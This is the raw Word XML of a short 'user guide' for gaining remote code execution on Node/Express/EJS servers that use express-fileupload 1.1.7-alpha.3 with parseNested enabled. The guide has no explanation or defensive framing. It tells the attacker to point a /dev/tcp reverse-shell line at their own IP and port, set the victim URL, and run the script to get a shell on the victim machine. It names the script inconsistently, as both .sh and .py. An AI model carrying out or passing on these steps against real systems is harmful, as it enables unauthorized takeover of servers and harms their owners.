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DB2D" w14:textId="2B1A354C" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc55996349"/>
      <w:r w:rsidRPr="000E10AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="000E10AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>imple Remote Code Execution on EJS Web Applications with express-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E10AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>fileupload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="277B5E75" w14:textId="6DBEBBAB" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:r>
        <w:t xml:space="preserve">User guide no explanation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29801CDB" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRPr="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9DE0AB" w14:textId="211D34E4" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Prerequisites</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="25C0D71D" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">The folder which this doc exists in, should have these </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="720948F3" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRPr="00C67F2A" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754075">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB9E5D4" wp14:editId="75B2A9B7">
            <wp:extent cx="3029373" cy="2819794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0952D" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc55996350"/>
      <w:r>
        <w:t>Attacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="6DA7C5C6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BA79EC">
        <w:t>Linux machine with Python and Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B2262" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRPr="00BA79EC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Able to connect to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Victim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3B42E158" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCBBB59" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc55996351"/>
      <w:r>
        <w:t>Victim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="15DEF8A9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running Node + Express + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EJS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25F62F22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Using express-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileupload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AE69E" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EE2F3D" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc55996352"/>
      <w:r>
        <w:t>Set-up</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0D970A1C" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc55996353"/>
      <w:r>
        <w:t>Attacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="766B8A91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6B4D31">
        <w:t xml:space="preserve">Have </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4D31">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>EJS-RCE-attack.py</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4D31">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4D31">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run-EJS-RCE.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the same </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>directory</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16AFD7F0" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRPr="001B2AD2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Modify to fit attacker’s machine address and port. Line 13, change </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/192.168.98.11/8020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/&lt;attacker’s IP address&gt;/&lt;attacker’s port to listen for connection from victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FBBE05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Modify to fit victim’s machine address and port. Line 17 and line 21. Change http address to victim’s web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3EB5A99F" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B2AD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6225B80E" wp14:editId="5C12E48D">
            <wp:extent cx="5925312" cy="3261016"/>
            <wp:effectExtent l="19050" t="19050" r="184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91080" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3AF33D" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc55996354"/>
      <w:r>
        <w:t>Victim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="229244DA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Victim must have a webserver running Node, Express, and EJS. Version does not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>matter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="606822EE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must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01AC3">
        <w:t>express-fileupload@1.1.7-alpha.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610E618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must have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseNested</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> option set to true within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileupload’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app.use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Line 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157F432" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E57906">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD6CB8A" wp14:editId="5A4B5090">
            <wp:extent cx="5925312" cy="1537660"/>
            <wp:effectExtent l="19050" t="19050" r="1841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53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FF4F6" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA55032" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc55996355"/>
      <w:r>
        <w:t>Launch Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="470244F0" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">After set-up is complete, simply run </w:t>
      </w:r>
      <w:r w:rsidRPr="00195119">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>run-EJS-RCE.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> from attacker’s machine in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D1B7C8F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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>run-EJS-RCE.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62865DD4" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:r>
        <w:t xml:space="preserve">A shell from victim machine should open on attacker’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57CA6CB9" w14:textId="77777777" w:rsidR="000E10AB" w:rsidRPr="0005329A" w:rsidRDefault="000E10AB" w:rsidP="000E10AB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002629DC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165E7F94" wp14:editId="42510D62">
            <wp:extent cx="4944165" cy="914528"/>
            <wp:effectExtent l="19050" t="19050" r="88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BEE05" w14:textId="77777777" w:rsidR="000B4AD4" w:rsidRDefault="000B4AD4"/>
    <w:sectPr w:rsidR="000B4AD4" w:rsidSect="00BC29D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AA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A58924E"/>
    <w:lvl w:ilvl="0" w:tplc="491E80FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="code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5E43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="846CB30A"/>
    <w:lvl w:ilvl="0" w:tplc="0AAA939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626151"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9ECB088"/>
    <w:lvl w:ilvl="0" w:tplc="B39CF0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AB"/>
    <w:rsid w:val="000B4AD4"/>
    <w:rsid w:val="000E10AB"/>
    <w:rsid w:val="00160C9B"/>
    <w:rsid w:val="001E0990"/>
    <w:rsid w:val="00411F12"/>
    <w:rsid w:val="00466D73"/>
    <w:rsid w:val="005D668B"/>
    <w:rsid w:val="00613304"/>
    <w:rsid w:val="00723936"/>
    <w:rsid w:val="00801ECE"/>
    <w:rsid w:val="00913A28"/>
    <w:rsid w:val="0093289F"/>
    <w:rsid w:val="00975E8D"/>
    <w:rsid w:val="009F68CC"/>
    <w:rsid w:val="00B02B77"/>
    <w:rsid w:val="00B675D6"/>
    <w:rsid w:val="00C76C55"/>
    <w:rsid w:val="00CE372F"/>
    <w:rsid w:val="00DB4A0C"/>
    <w:rsid w:val="00E11837"/>
    <w:rsid w:val="00E328DB"/>
    <w:rsid w:val="00E35A60"/>
    <w:rsid w:val="00E6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D87A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7999C711-78FE-4D4B-801B-D91FDB1F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32"/>
        <w:szCs w:val="3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AB"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia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EB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5A60"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E61EB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948A54" w:themeColor="background2" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-S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7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39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B7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1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E35A60"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-SG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B4A0C"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto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61EB7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="948A54" w:themeColor="background2" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-SG"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:link w:val="codeChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00E61EB7"/>
    <w:rPr>
      <w:rFonts w:ascii="Ubuntu Mono" w:hAnsi="Ubuntu Mono"/>
      <w:color w:val="C00000"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-SG"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code"/>
    <w:rsid w:val="00E61EB7"/>
    <w:rPr>
      <w:rFonts w:ascii="Ubuntu Mono" w:hAnsi="Ubuntu Mono"/>
      <w:color w:val="C00000"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-SG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60C9B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675D6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="3D3923"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-SG"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0093289F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E328DB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="24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MAH XIN AN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>TIMOTHY MAH XIN AN</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-16T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-16T19:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>